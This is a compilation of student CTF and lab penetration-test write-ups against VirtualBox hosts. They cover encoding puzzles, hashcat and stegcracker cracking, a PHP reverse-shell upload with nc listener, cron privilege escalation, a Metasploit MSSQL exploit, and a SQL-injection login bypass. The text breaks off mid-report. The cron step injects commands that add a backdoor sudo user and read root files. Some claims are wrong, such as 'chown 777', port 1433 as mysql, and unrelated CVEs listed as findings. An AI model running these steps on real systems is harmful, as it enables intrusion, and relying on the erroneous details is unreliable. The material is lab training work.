LINK TO CHALLENGE FILES: https://drive.google.com/drive/folders/1mEiKAbu9R3o8ty_xnmM7jOrBrnsn33h2?usp=drive_link

Challenge Walkthroughs

I. Challenge 1
• Identification of encoding(s), encryption(s), etc.
- It is an ascii string converted to hexadecimal then encoded in base64 notation
• Method(s) to decode/decrypt/etc.
- CyberChef decoding
• flag:{flag-one-is-easy}

1. The first challenge is in a .txt file. It seems to be an encoded string.

2. From past cryptographic experience it looks to be a base64 encoding. We will use CyberChef
to decipher it.

3. It has given us a hexadecimal value. We will decode it into ascii

The result: flag:{flag-one-is-easy}

II. Challenge 2
• Identification of encoding(s), encryption(s), etc.
- Decimal and Caesar ciphered ascii
• Method(s) to decode/decrypt/etc.
- Convert decimal to ascii then decode Caesar cipher
• Flag: flag:{secondFlag-is-moreDifficult}

1. Flag 2 is yet another string in a .txt file. This time it is a series of decimal numbers.

2. The result is a seemingly random assortment of numbers but through research and experience I have identified it as a Caesar cipher. A Caesar cipher is a type of substitution cipher, and it is one of the simplest and oldest methods of encryption. It was used by Julius Caesar, the Roman Emperor, and hence the name “Caesar cipher.”

Knowing that the flag is in the format of “flag:{flag-contents-here}” we can decode “synt” into “flag” and we will know the shift value. Since the letter “f” is 13 letters away from “s”. This is our shift value.

The result: flag:{secondFlag-is-moreDifficult}

III. Challenge 3
• Identification of encoding(s), encryption(s), etc.
- Hashed password : a6a7c0ce5a93f77cf3be0980da5f7da3
- 7zip folder that had a password.
• Method(s) to decode/decrypt/etc.
- Dictionary attack with hashcat
• Flag: flag:{youUsed-AcOo1-T0ol}

1. The third flag is in a password protected zip file with an accompanying .txt file where the presumed password is stored. After several attempts at decoding the string there were no
results. We will use a dictionary attack with Hashcat.

2. We will use a wordlist that comes with Kali, unzip it with this command.
gzip -d /usr/share/wordlists/rockyou.txt.gz. Before you run the hashcat command, you might have to increase allocated memory to your Kali
machine as I had to do the same.

3. Here is the execution of the Hashcat.

4. The output will be in a cracked.txt file.

5. Enter the password

6. The flag is here

Credits to: https://resources.infosecinstitute.com/topics/hacking/hashcat-tutorial-
beginners/

IV. Challenge 4
• Identification of encoding(s), encryption(s), etc.
- Message was hidden using the steghide embed functionality and protected by a password
• Method(s) to decode/decrypt/etc.
- The steg password was cracked by the rockyou.txt wordlist using stegcracker.

1. First try to gain information by using the exif tool. The Exif Tool is a powerful and versatile command-line utility used for reading, writing, and editing metadata information in various media files, primarily images and videos. “Exif” stands for “Exchangeable Image File Format,” which is a standard for storing metadata in image files, including details such as camera settings, GPS location data, date and time, and much more.

2. We will then try to extract the message using steghide extract option.
Unfortunately there is a password so we need to crack it.

3. I renamed the file to “four.jpg” for easier typing. Then I used stegcracker four.jpg
/usr/share/wordlists/rockyou.txt

4. The function will return the hidden message. The flag within the jpg.

flag:{stegIs-Actu4llypR3ttyr4re?}

Credits to: https://medium.com/the-kickstarter/steganography-on-kali-using-steghide-7dfd3293f3fa

Executive Summary

The purpose of this penetration test is to assess the security posture of the machine deployed by “Web Application Labs Inc.” in their production DMZ network. I aim to identify vulnerabilities and weaknesses in the system that could potentially be exploited by attackers.

By simulating real-world attack scenarios, the penetration test aims to uncover any potential security flaws, misconfigurations, or vulnerabilities that could lead to unauthorized access or compromise of the system.

The ultimate goal is to provide actionable recommendations to the company to improve its security defenses and mitigate potential risks.

IP Address or Hostname in Scope

The listening or control machine for the test is 10.0.2.15.
The target machine IP is 10.0.2.8

Penetration Test Type

Based on the scenario provided, the penetration test being conducted can be categorized as a “Black Box” or “External” penetration test. A Black Box penetration test simulates an attacker without prior knowledge or internal access to the target system.

Specifically, the conducted Pentest is a combination of Network Penetration Test, Web Application Penetration Test, User Access, and Privilege Escalation.

Fingerprinting

1. Network Scan (nmap -sn 10.0.2.0/24):
   This step involves using the Nmap tool with the “-sn” option to perform a “ping sweep” scan on the network range 10.0.2.0/24. It sends ICMP echo requests (pings) to each IP address in the specified range to determine which hosts are online and responsive.

2. OS Scan (nmap -O 10.0.2.8):
This step utilizes Nmap’s OS detection feature (“-O”) to identify the operating system running on the target machine with the IP address 10.0.2.8. It sends specific probes and analyzes the responses to make an educated guess about the operating system in use.

3. Aggressive Scan (nmap -A 10.0.2.8):
An aggressive scan (“-A”) in Nmap combines several advanced techniques to gather more detailed information about the target system. It includes OS detection, version detection of running services, script scanning, and traceroute to provide a comprehensive analysis.

4. Noting Open Ports:
Throughout the scans performed in steps 2 and 3, open ports on the target machine are identified. Open ports indicate which network services are running and accessible on the target system. It helps in understanding potential entry points for further enumeration and exploitation.
• 21/tcp open ftp vsftpd 3.0.3
• 80/tcp open http Apache httpd 2.4.53 ((CentOS Stream))

5. Nikto Scan (nikto -h 10.0.2.8):
The command “nikto -h 10.0.2.8” initiates a scan using the Nikto tool against the target machine with the IP address 10.0.2.8. Nikto is a web vulnerability scanner that identifies known vulnerabilities in web applications, servers, and scripts. It checks for common issues like
outdated software versions, misconfigurations, and other security weaknesses.

6. Noting Revealed Directories:
During the Nikto scan, directories and paths exposed by the target web server are identified. These directories can provide valuable information about the structure of the web application and potentially reveal sensitive or hidden content.

• /Bwf3fN2v.php
• /ftp/
• /robots.txt
• /Administration/
• /info.php
• /icons/
• /icons/README

7. Exploring Directories:
After noting the directories revealed in the previous step, further investigation is conducted by manually accessing and exploring these directories. This allows for potential discovery of additional files, endpoints, or vulnerabilities.

8. The presence of directives in the robots.txt file disallowing access to FTP and administration paths could indicate potential vulnerabilities or sensitive areas that the website owner intends to protect. However, it’s important to note that the presence of these directives alone does not
guarantee the existence of vulnerabilities. It simply suggests that the website owner wants to restrict access to certain areas of the website or web application.

To determine if there are exploitable vulnerabilities related to FTP or administration, further investigation and testing would be required.

Vulnerability Analysis

Approach: Conducted a Black Box/External penetration test on a machine in the production DMZ network. Utilized a reverse shell upload to gain user access. Exploited vulnerabilities or misconfigurations in Cron jobs for privilege escalation.

Emphasized identifying network
configuration, networked services, local services, running processes, users and groups, scheduled tasks or jobs, filesystem contents, system parameters, and configuration files.

Vulnerability Description

• Weak Authentication and Base64 Encoding: The system allowed weak authentication, as evidenced by the base64-encoded password in the “user:b64:ZXQ3JlZFdVo=” format.

Mitigation: Implement strong password policies and enforce the use of complex passwords. Avoid encoding sensitive information in a weak format like base64.

• Unsecured File Upload and Execution:
  The system permitted the upload and execution of a reverse shell script (PHP) without proper access controls or validation.

Mitigation: Implement strict file upload controls, including validation of file types, proper file permissions, and scanning uploaded files for potential threats or malicious code.

• Misconfigured Scheduled Tasks (Cron Jobs):
  The “/etc/crontab” file contained misconfigurations that allowed for unauthorized privilege escalation.

Mitigation: Regularly review and validate the configurations of scheduled tasks (cron jobs). Ensure that only trusted and necessary tasks are scheduled and that they execute with the appropriate permissions.

• Insecure File Permissions:
  The permissions for the reverse shell script were set to allow universal read, write, and execute access (777).

Mitigation: Apply the principle of least privilege by granting permissions only to the necessary entities (users, groups, or roles). Follow best practices for file permissions to minimize the risk of unauthorized access or modification.

• Lack of Input Validation and Sanitization:
  The system did not properly validate or sanitize user input, which allowed for the injection of malicious commands into the “/var/www/check/sh” file.

Mitigation: Implement robust input validation and sanitization techniques to prevent injection attacks. Use secure coding practices, such as parameterized queries, to defend against SQL injection and similar vulnerabilities.

Proof of Concept

1. Investigating the Administration Directory (10.0.2.8/Administration/.passwd):

Access the administration directory using the URL “10.0.2.8/Administration/.passwd”. This directory may contain valuable information or potential vulnerabilities related to administration.

2. Decoding User Details:

Given the details “user:b64:ZXQ3JlZFdVo=”, deduce that the username is “user”. Decode the password as a base64 derivation of “ZXQ3JlZFdVo=”, resulting in “et7&VEuZ”.

3. Uploading a Reverse Shell:

Download a reliable PHP reverse shell script from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Change the port and IP to the listening machine. Upload the script to the target system.

4. Change Permissions Modify the permissions of the uploaded reverse shell script to ensure it can be executed. Use the command “chown 777 <uploaded-script.php>”.

5. Open a Port Listener Set up a port listener on port 4444 to establish a reverse shell connection. Use the command “nc -lvnp 4444”.

6. Find the User Flag Once you have a reverse shell connection, navigate the system to locate the user flag.

The flag value is “acdb70ff7bb36fc94492cd6dd9896e99”.

> acdb70ff7bb36fc94492cd6dd9896e99

7. Look for Privilege Escalation Opportunities Refer to the source [link to
https://book.hacktricks.xyz/linux-hardening/privilege-escalation] for various privilege escalation techniques. One method discussed is through scheduled tasks, which can be found using the “/etc/crontab” file.

8. Investigate the “/opt/backup.sh” File Examine the “/opt/backup.sh” file for potential vulnerabilities or misconfigurations.

9. Edit the “/var/www/check/sh” File Identify that the “/var/www/check/sh” file is executed with root privileges. Modify the file’s contents to serve your objectives.

10. Insert Commands into the “/var/www/check/sh” File Paste the following commands into the file:

• cat /root/root.txt >> /var/www/html/result.log
• useradd -m -p $(openssl passwd -1 password) -s /bin/bash admin
• echo “admin ALL=(ALL) NOPASSWD:ALL” >> /etc/sudoers

Each command performs a specific action, such as appending the root flag to a log file, creating a new user named “admin” with a hashed password, and granting administrative privileges to the “admin” user.

11. Gain Access in Less Than 5 Minutes By following the above steps, you should be able to establish a reverse shell, locate the user flag, and escalate privileges within a short timeframe.

12. Obtain Root Access Enter the command “sudo -s” to switch to the root user and gain root access.

13. Confirm Root Access and Capture the Flag Type “whoami” to confirm that you have root access. Capture the flag to signify the successful completion of the pentest.
456dcf6dc529e26940d6ae11fd3750f4

Recommendations

• Enforce Strong Password Policies:
  Implement password complexity requirements, including a minimum length, a combination of alphanumeric and special characters, and regular password expiration. Educate users about the importance of using strong and unique passwords.
• Implement Secure File Upload Controls:
  Validate uploaded files for type and content integrity, ensuring they adhere to accepted file formats and specifications. Apply proper file permissions to uploaded files to prevent unauthorized execution or access.
• Regularly Review and Secure Scheduled Tasks:
  Periodically review and validate the configurations of scheduled tasks (cron jobs). Remove or disable any unnecessary or outdated tasks.
  Ensure that scheduled tasks execute with the appropriate permissions and follow the principle of least privilege.
• Apply Principle of Least Privilege:
  Regularly review and adjust file permissions, granting access only to the necessary entities (users, groups, or roles). Limit the permissions granted to executable files, scripts, and directories to prevent
  unauthorized execution or modifications.
• Implement Input Validation and Sanitization:
  Validate and sanitize user input to prevent injection attacks, such as command injection, SQL injection, and cross-site scripting (XSS).
  Use secure coding practices and input validation libraries to ensure the integrity and security of user-provided data.

References

• https://book.hacktricks.xyz/linux-hardening/privilege-escalation
• https://www.redhat.com/sysadmin/introduction-vi-editor
• https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses
• https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
• https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
• https://book.hacktricks.xyz/linux-hardening/privilege-escalation#cron-path
• https://askubuntu.com/questions/419548/how-to-set-up-a-root-cron-job-properly
• https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux

Executive Summary

The purpose of this penetration test is to identify vulnerabilities, assess security controls, and validate existing security measures on the Windows 10 system used as a testing server by one of the developers.

The director of IT has noted a potential risk with this setup and requires our expertise to evaluate the associated security implications. Through our testing, we aim to provide a comprehensive report detailing the vulnerabilities found, the level of risk they pose, and our recommended mitigation strategies.

This report will assist the director in making informed decisions about the continuation or discontinuation of this server’s use in the current form. It is our goal to help the organization improve their overall security posture, minimize risk, and ensure the server meets the organization’s security standards.

Outline of the scope

a. IP Address or Hostname in Scope

The target machine for this penetration test is the system with the IP address 10.0.2.7, which is part of the 10.0.2.0/24 subnet. The listening or control machine for the test is 10.0.2.15.

b. Penetration Test Type

The penetration test performed in this instance is an Internal Network Penetration Test, conducted on a single system. As external contractors, I conducted the penetration test from within the organization’s internal network, with a particular focus on a Windows 10 server that has been utilized as a testing server by one of their developers.

I primarily employed a suite of tools available in Kali Linux, including nmap for network scanning and reconnaissance, and Metasploit for vulnerability scanning and exploit development.

Findings

Fingerprinting

During the fingerprinting phase of the penetration testing engagement, various scans were conducted to gather information about the target system at IP address 10.0.2.7. The results reveal the operating system, open ports, and identified services.

1. Network Scan:

We executed a network scan using the command: nmap -sn 10.0.2.0/24

Identified the likely IP address of the target system as 10.0.2.7.

2. OS Scan:

We performed an OS scan to determine the operating system running on the target using the command: nmap -O 10.0.2.7

Established that the target system is running a Microsoft Windows operating system.

3. Aggressive Scan:

Conducted an aggressive scan to gather comprehensive information using the command: nmap -A 10.0.2.7

Note the discovered the following open ports and services on the target system:

· Port 135/tcp: Identified as Microsoft Windows RPC service.

· Port 139/tcp: Recognized as Microsoft Windows netbios-ssn (NetBIOS Session Service).

· Port 445/tcp: Detected as Microsoft Windows file sharing service (possibly Microsoft-DS).

· Port 1433/tcp: Identified as Microsoft SQL Server 2022 (Version 16.00.1000.00; RC0+).

Vulnerability Analysis

Vulnerability analysis is a vital part of cybersecurity management, aimed at identifying, quantifying, and prioritizing system vulnerabilities. This specific analysis of ports 135, 139, 445, and 1433, associated with Microsoft services, is crucial to ascertain the potential risks these services could pose.

By identifying vulnerabilities, the analysis aids in formulating effective mitigation strategies, from software patches to system configuration adjustments, or even complete system replacement when necessary. These evaluations are instrumental for meeting compliance with various security regulations and standards, such as GDPR or PCI-DSS. Furthermore, by pinpointing the most severe vulnerabilities, resources can be optimally allocated, enabling security teams to prioritize their remediation efforts effectively.

This proactive approach to cybersecurity, made possible through regular vulnerability assessments, equips organizations to address potential threats before they are exploited, strengthening their overall security stance.

Vulnerability Description

Proof of Concept

Now on to a demonstration of the exploit

1. Our first step was to examine each open port on the target system for potential vulnerabilities. We started with port 135, a well-known port associated with Microsoft’s Distributed Component Object Model services. However, we found that we couldn’t access this port in this instance. This could suggest a well-configured firewall or other security controls that were protecting the port.

2. Port 139 was initially used for SMB (Server Message Block) over the NetBIOS transport layer. NetBIOS facilitated communication among Windows computers within the same network. However, with advancements in SMB protocol, starting from Windows 2000, port 445 became the preferred choice, operating on a TCP stack for improved performance and security.

3. Then, we attempted an anonymous connection to the SMB service on port 139 using the smbclient tool. The command we used was <smbclient -L \\10.0.2.7\>. This technique allows us to list SMB shares without providing any user credentials.

The command returned a few share names. These share names indicate specific resources that are shared on the network. They could be directories or printers or any other resource that the system administrator decided to share.

4. We decided to investigate these shares further. Using the command smbclient -N \\10.0.2.7\, we connected to the SMB server at IP address 10.0.2.7, again without providing any user credentials. We then examined each share.

“ADMIN” and “C” shares were both inaccessible, suggesting some level of security controls in place.

5. “IPC” share was accessible but was empty.

6. “Management” share contained several directories.

7. Upon closer examination, we found a note in the “Notes” directory under the “Management” share titled “deleteme.txt”.

8. The text inside the note read, “5up3r53cur3P4s$!”. This looked like a password hint, so we noted it down for later use.

9. Lets boot up Metasploitable.

10. Now look for vulnerabilities and exploits in p 1433 Look for exploits for port 1433 AKA mysql. The command search type:exploit port:1433 is used within the Metasploit Framework to search for exploits specifically targeting the port number 1433.

11. Try the available exploits starting with a listed word attack.

That did not work.

12. Lets try a payload upload. As you can see it takes credentials such as user and password as well as IP target.

13. Simply set target to 10.0.2.7. This is requesting for a password. Let’s try “5up3r53cur3P4s$!” Then run it.

14. The exploit worked. Now we have a reverse shell. 16. Now it’s time to search for the flag.

15. Now that we have access to the system, our final task was to search for the flag — a specific piece of information that would indicate our success in this penetration test. Depending on the rules of the engagement, the flag could be anywhere on the system, so we had to be thorough. In our case, the flag was the ultimate proof that we successfully penetrated the system, and its discovery was the final goal of our test.

16. Thank you for reading my guide!

Flag.txt: a378894502e83fa1aeb3dcaa97931c73

Recommendations

Vulnerability Identified — Insecure Share Access on SMB Server

During the pentesting engagement, an insecure share access vulnerability was identified on the SMB (Server Message Block) server running on IP address 10.0.2.7.

This vulnerability allows anonymous access to certain shares and could potentially lead to unauthorized access, data leakage, or other security risks.

Mitigation Recommendations

To mitigate the insecure share access vulnerability, I recommend the following actions:

1. Restrict Anonymous Access: Configure the SMB server to disallow anonymous access to shares. By enforcing authentication for accessing shared resources, the risk of unauthorized access can be significantly reduced.

2. Implement Proper Access Controls: Review and strengthen the access controls for each share on the SMB server. Ensure that only authorized users or groups have appropriate access rights to the shared resources.

3. Regularly Update and Patch: Keep the SMB server and associated software up to date with the latest security patches and updates. This helps to address any known vulnerabilities and protect against potential exploits.

4. Enable Network-Level Encryption: Enable SMB encryption to ensure the confidentiality and integrity of data transmitted between the SMB server and clients. This helps protect against eavesdropping and unauthorized access to sensitive information.

5. Implement Network Segmentation: Consider implementing network segmentation to isolate the SMB server from other critical systems or sensitive data. This helps contain any potential compromises and limits the impact of a successful attack.

References:

· https://hacktricks.boitatech.com.br/pentesting/pentesting-smb

· https://www.hackingarticles.in/password-crackingsmb/

· https://www.cvedetails.com/

· https://nvd.nist.gov/vuln

Executive Summary

The purpose of this exercise is to conduct a thorough penetration test on a machine discovered in the production DMZ network.

The objective is to identify and assess vulnerabilities within the system, which will assist the company in understanding the potential risks associated with the machine and making informed decisions about its security. From this, we will provide recommendations for remediation aim for the prompt removal of the vulnerable system.

Outline of the scope

a. IP Address or Hostname in Scope

Listener host: 10.0.2.15

Target: 10.0.2.5

b. Penetration Test Type

This operation is a company sponsored web application penetration test to evaluate the security of their web app. The focus of this testing is on assessing the web application’s vulnerabilities using various methods. The test will be carried out by conducting an Nmap scan, which gathers information about open ports, services, and potential vulnerabilities that may exist.

Next, a DIRB inquiry is performed to identify any hidden directories and files on the web server that could pose security risks. Finally, a SQL injection attack is executed to assess the web application’s susceptibility to this common form of attack.

By conducting this comprehensive testing, the company aims to identify and address any weaknesses in their web application’s security, ultimately enhancing its resilience against potential threats.

Findings

Fingerprinting

Fingerprinting is important in the context of penetration testing as it allows for the identification and gathering of information about a target system.

In the given scenario, the information obtained manually from the service interaction is as follows: The service running on port 80 is identified as Apache httpd version 2.4.53 on CentOS Stream. This indicates the specific version of the web server software in use. The operating system is likely CentOS Stream based on the information about the web server. No explicit misconfigurations or security issues are mentioned, requiring further analysis or additional testing to identify any potential misconfigurations or vulnerabilities within the target system.

In the following steps we will demonstrate how we can get valuable information that will be useful in the exploitation of the system.

1. Open a root terminal on Kali

2. Perform a network scan.

Use command:
<nmap -sn 10.0.2.0/24>

Note the IP of the target, in this case:

Nmap scan report for testbed.webapp.lab (10.0.2.5)

Host is up (0.00071s latency).

MAC Address: 08:00:27:73:7D:16 (Oracle VirtualBox virtual NIC)

3. Perform an aggressive scan on the target, in this case:

<nmap -A 10.0.2.5>

Results:

Starting Nmap 7.93 ( https://nmap.org ) at 2023–06–13 21:07 EDT

Nmap scan report for testbed.webapp.lab (10.0.2.5)

Host is up (0.00085s latency).

Not shown: 989 filtered tcp ports (no-response), 10 filtered tcp ports (admin-prohibited)

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.4.53 ((CentOS Stream))

|_http-server-header: Apache/2.4.53 (CentOS Stream)

| http-methods:

|_ Potentially risky methods: TRACE

|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).

MAC Address: 08:00:27:73:7D:16 (Oracle VirtualBox virtual NIC)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Linux 4.X|5.X

OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5

OS details: Linux 4.15–5.6, Linux 5.0–5.4

Network Distance: 1 hop

TRACEROUTE

HOP RTT ADDRESS

1 0.85 ms testbed.webapp.lab (10.0.2.5)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 18.78 seconds

Note the open ports, in this case:

80/tcp open http Apache httpd 2.4.53 ((CentOS Stream))

Notice specifically that port 80 is indicated, which is typically used for HTTP web traffic. The service running on that port is identified as Apache httpd version 2.4.53, running on CentOS Stream.

The line “_http-methods: Potentially risky methods: TRACE” suggests that the HTTP server supports the TRACE method. The TRACE method is an HTTP request method used for diagnostic purposes, allowing a client to see how a request is handled by the server. It can be considered potentially risky because it may reveal sensitive information or open up vulnerabilities if misused or if the server is misconfigured.

Vulnerability Analysis

The scenario presents multiple vectors of attack, highlighting the potential vulnerabilities in Apache, Linux, and HTTP. The presence of vulnerabilities in these widely used technologies raises concerns about their overall security. The Linux kernel, if not patched, may suffer from a outdated issues. Additionally, the HTTP TRACK & TRACE methods in servers can expose sensitive information. These vulnerabilities serve as a reminder that even widely adopted technologies require diligent security measures to mitigate risks and ensure a safe computing environment.

There are multiple vectors of attack in this scenario. Apache , Linux, HTTP,

• The vulnerability associated with the open port 80 (HTTP) on the target machine is related to the Apache httpd server version 2.4.53 running on CentOS Stream.
• The HTTP server does not provide a specific title for the site, and the use of TRACE HTTP method is considered potentially risky.

Vulnerability Description

Here is a breakdown featuring some of the vulnerabilities that can be derived from the vectors mentioned in the analysis.

CVE ID: CVE-2019–6579
Score: 9.8
Description

A critical vulnerability in Spectrum Power 4 (with Web Office Portal) allows an unauthenticated attacker with network access to execute system commands with administrative privileges. Exploiting this vulnerability compromises the confidentiality, integrity, or availability of the targeted system. No user interaction is required, and no public exploitation has been reported.

CVE ID: CVE-2022–30522
Score: 5.0
Description

In Apache HTTP Server 2.4.53, when mod_sed is used for transformations in contexts with potentially large inputs, excessive memory allocations can occur, leading to an abort.

CVE ID: CVE-2021–35233
Score: 5.3
Description

Kiwi Syslog Server 9.7.1 and earlier enable the HTTP TRACK & TRACE methods, which can disclose sensitive information by responding with the exact HTTP request received. These methods should only be used for diagnostic purposes, but if enabled, they may reveal internal authentication headers added by reverse proxies.

CVE ID: CVE-2017–1000253
Score: 7.2
Description

This Linux kernel vulnerability affects distributions that haven’t patched their long-term kernels. When CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE is enabled and a top-down address allocation strategy is used, a mapping issue occurs with PIE binaries, allowing subsequent PT_LOAD segments to be mapped above the intended address range. Exploiting this vulnerability requires specific kernel configurations and can result in improper memory mappings.

CVE ID: CVE-2022–0650
Score: 8.0
Description

TP-Link TL-WR940N 3.20.1 Build 200316 Rel.34392n (5553) routers are susceptible to arbitrary code execution by network-adjacent attackers. The flaw exists within the httpd service, which fails to properly validate the length of user-supplied data before copying it to a fixed-length stack-based buffer. Successful exploitation allows the attacker to execute code as root. Authentication is required, and the vulnerability is tracked as ZDI-CAN-13993.

Source: https://nvd.nist.gov

Proof of Concept

Here we will demonstrate the methods we use for exploitation of the web application.

1. We will now proceed to check to see if there are any directories within the target web server. To this end we will use Dirb.

Dirb is a popular web content scanner and directory brute-forcing tool. It is designed to enumerate directories and files on a web server, helping to identify hidden or vulnerable areas that may be susceptible to unauthorized access or information disclosure.

Dirb works by sending HTTP requests to the target website and analyzing the server’s response. It leverages a wordlist or dictionary containing potential directory and file names to systematically scan and enumerate web content.

Set dirb to the target IP:

<dirb http://10.0.2.5>

Notice:

— — Scanning URL: http://10.0.2.5/ — —

+ http://10.0.2.5/cgi-bin/ (CODE:403|SIZE:199)

+ http://10.0.2.5/index.html (CODE:200|SIZE:456325)

==> DIRECTORY: http://10.0.2.5/reminder/

(!) WARNING: Directory IS LISTABLE. No need to scan it.

(Use mode ‘-w’ if you want to scan it anyway

2. Dirb showed us the paths to the folders in the WebApp. We shall investigate and explore them in order.

· http://10.0.2.5/cgi-bin/

· http://10.0.2.5/index.html/

· http://10.0.2.5/reminder/

We will navigate to http://10.0.2.5/cgi-bin/

This link is a dead end.

3. We will try next to navigate to http://10.0.2.5/index.html

In this webpage there are several hyperlinks that we can explore:

· https://www.centos.org/

· http://www.internic.net/whois.html

· http://webapp.lab

For now we don’t have enough information, but these may come in handy later. We shall keep them in mind.

4. We will navigate to http://10.0.2.5/reminder/

Upon examining the contents of the file reminder.txt it is revealed that an app on the testbed vhost is not patched. The admins may have left authentication which can be bypassed. This note could be a mistake but regardless, as pentesters we will not overlook this information which could lead us to an exploit.

5. Since the note specifically mentions an app on the testbed vhost in the context of a testbed vhost, an “app” refers to an application or software program that is hosted or deployed on the testbed’s virtual host. A vhost is a virtual server that allows multiple websites or applications to be hosted on the same physical server, each with its own isolated environment.

We will try modifying the url for the webapp which has already been provided

“http://webapp.lab"

has been modified into

“http://testbed.webapp.lab"

6. This url will lead us to a PHP testing server on a virtual host. After clicking on the login button, we are prompted to a typical login screen which asks us for credentials.

If you recall, the reminder that was left for us mentioned that there was a way to bypass authentication.

For vulnerabilities like that an SQL injection is known to be an effective method to gain access.

SQL injection is a type of web application security vulnerability that occurs when an attacker can manipulate the input parameters of a web application to inject malicious SQL (Structured Query Language) code into the application’s database query.

This is exactly what we will attempt to do.

7. In this step I will demonstrate how we can use the regex-like properties of an SQL injection attack to bypass authentication

The string “admin’or’1'=’1” can be used in an SQL injection attack to bypass authentication mechanisms that rely on SQL queries for verifying credentials. The specific behavior and effectiveness of this string would depend on how the authentication logic is implemented in the targeted application.

input username: admin’or’1'=’1

password can be any string

Credits: https://www.youtube.com/watch?v=TSqXkkOt6oM

8. The intention with this query is to find a matching row in the users table where the provided username and password match. However, since the application is vulnerable to SQL injection, we can exploit it by manipulating the input parameters.

In the case of the string “admin’or’1'=’1”, we inject additional SQL code to modify the query’s logic. The portion injects, ‘or’1'=’1, is a condition that always evaluates to true. So, the query gets modified accordingly

By injecting this string, we have gained unauthorized access to an application by impersonating the user “admin” or any other account without the password.

9. Once we have access to the console we can use the ‘find’ command to check if the flag is in the present directory.

10. When we locate the flag it is now a simple matter to read its contents :

11. Enter the command:

<cat /flag.txt>

flag.txt: c37c0f63cb584676b9599191ffa91256

Recommendations

Here are recommendations to mitigate the identified vulnerabilities:

1. Apache HTTP Server TRACE Method:

Disable the TRACE HTTP method on the server configuration to prevent potential information disclosure. This can be done by modifying the server’s configuration file (e.g., httpd.conf) and removing or commenting out the “TraceEnable” directive.

2. Apache HTTP Server Version Disclosure:

Configure the server to suppress the display of version information in HTTP responses. This can be achieved by setting the “ServerTokens” directive in the server configuration file to “Prod” or “ProductOnly” value.

a. SQL Injection:

Implement proper input validation and parameterized queries in web application code to mitigate the risk of SQL injection attacks. This involves using prepared statements or parameterized queries instead of dynamically constructing SQL queries with user-supplied input.

b. Cross-Site Scripting (XSS):

Apply input validation and output encoding techniques to prevent the injection of malicious scripts into web pages. Use security libraries or frameworks that provide built-in protection against XSS vulnerabilities, such as output escaping or content security policies (CSP).

c. Directory Traversal:

Implement strict input validation and access controls to prevent directory traversal attacks. Ensure that user-supplied input is validated and sanitized before being used to access files or directories on the server. Implement proper file and directory permissions to restrict unauthorized access.

d. Remote Code Execution:

Keep the server’s software and dependencies up to date with the latest security patches to minimize the risk of remote code execution vulnerabilities. Regularly check for updates and apply them promptly. Additionally, follow secure coding practices to minimize the risk of introducing vulnerabilities in custom code.

Executive Summary

· Goals and Timeline

a. Purpose:

As a Pentester for this organization, the purpose of this penetration test is to assess the security posture of the Linux system hosted at IP address 10.0.2.6. My test aims to identify vulnerabilities, weaknesses, and potential entry points that an attacker could exploit. The findings from this test will be reported to the IT director in a hope to assist in determining the level of risk associated with the system and provide the budget required for updating its posture.

b. Start and Stop Dates:

The project started on June 01, 2023 and concluded on June 07, 2023.

· Outline of the scope

a. IP Address or Hostname in Scope

· Host Listening Machine: 10.0.2.15

· Target Machine: 10.0.2.6

· Target Ports:

o Port 21 (FTP)

o Port 3333

b. Pentration Test Type

The penetration test employed a combination of active and passive reconnaissance techniques, followed by exploitation using msfvenom on Kali Linux. This approach helps uncover vulnerabilities and potential attack vectors within the target system.

Findings

· Fingerprinting.

During the penetration test, the following tools and techniques were used to perform fingerprinting and interact with ports 21 and 3333:

1. Open Kali as root.

2. Perform a network scan using the command “nmap -sn” on the subnet 10.0.2.0/24.

3. Perform an operating system scan on each IP to determine which one is running Linux, as this is likely the target machine.

4. Perform an aggressive scan on the IP address 10.0.2.6.

Here are the Logged results:

Nmap scan report for 10.0.2.6

Host is up (0.00090s latency).

Not shown: 987 filtered tcp ports (no-response), 11 filtered tcp ports (admin-prohibited)

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_drwxr-xr-x 2 0 0 22 Oct 30 2022 pub

| ftp-syst:

| STAT:

| FTP server status:

| Connected to ::ffff:10.0.2.15

| Logged in as ftp

| TYPE: ASCII

| No session bandwidth limit

| Session timeout in seconds is 300

| Control connection is plain text

| Data connections will be plain text

| At session startup, client count was 3

| vsFTPd 3.0.3 — secure, fast, stable

|_End of status

3333/tcp open dec-notes?

MAC Address: 08:00:27:D5:44:8C (Oracle VirtualBox virtual NIC)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Linux 4.X|5.X

OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5

OS details: Linux 4.15–5.6, Linux 5.0–5.4

Network Distance: 1 hop

Service Info: OS: Unix

TRACEROUTE

HOP RTT ADDRESS

1 0.90 ms 10.0.2.6

5. Note the two open ports: port 21 and port 3333.

6. Starting with port 21, from our aggressive scan of the target machine, we notice the following weakness:

21/tcp open ftp vsftpd 3.0.3

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

|_drwxr-xr-x 2 0 0 22 Oct 30 2022 pub

| ftp-syst:

| STAT:

| FTP server status:

| Connected to ::ffff:10.0.2.15

| Logged in as ftp

| TYPE: ASCII

It states that it is logged in as FTP. Let’s try accessing the service using the command “<ftp 10.0.2.6>”.

7. Knowing the username, we can try to log in using commonly used passwords.

The password was ‘ftp’, and we gained access. This serves as a reminder to use stronger authentication when configuring any kind of access.

8. Let’s explore the discovered FTP entrance:

As you can see, we have found an interesting file named “todo.txt”.

Here is the list of commands I used to read its contents:

ftp> ls

ftp> cd pub

ftp> ls

ftp> less todo.txt

